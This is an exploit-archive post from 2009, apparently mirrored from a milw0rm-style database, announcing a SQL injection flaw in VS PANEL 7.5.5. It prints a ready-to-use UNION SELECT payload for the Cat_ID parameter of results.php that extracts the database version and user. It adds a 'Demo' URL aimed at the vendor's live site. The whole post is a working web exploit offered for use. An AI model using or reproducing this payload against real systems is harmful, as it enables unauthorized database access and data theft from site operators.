[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : VS PANEL 7.5.5 (Cat_ID) SQL Injection Vulnerability (patched?)
# Published : 2009-07-27
# Author : octopos
# Previous Title : iWiccle 1.01 (LFI/SQL) Multiple Remote Vulnerabilities
# Next Title : PHP Paid 4 Mail Script (home.php page) Remote File Inclusion Vuln


#################### Infos ########################################
# [Re]Found : Otavio Augusto a.k.a octopos ( octopos8?gmail.com ) #
# Product: VS PANEL v.7.5.5   (Patched?)                          #
# Homepage: http://www.vspanel.gr/                                #
###################################################################

############################################################
# Bug Original posted in http://milw0rm.com/exploits/9171  #
# Appears that VS PANELS V7.5.5 was "corrected" the bug    #
# changing the number of columns to 26... Oo               #                                                                                              
############################################################

############################################## SQL Injection #################################################################################
#  site/path/results.php?Cat_ID=null+union+all+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--    #
##############################################################################################################################################


############################################### Demo ###################################################################################################
# http://www.vspanel.gr/results.php?Cat_ID=null++union+all+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--  #
########################################################################################################################################################

# www.Syue.com [2009-07-27]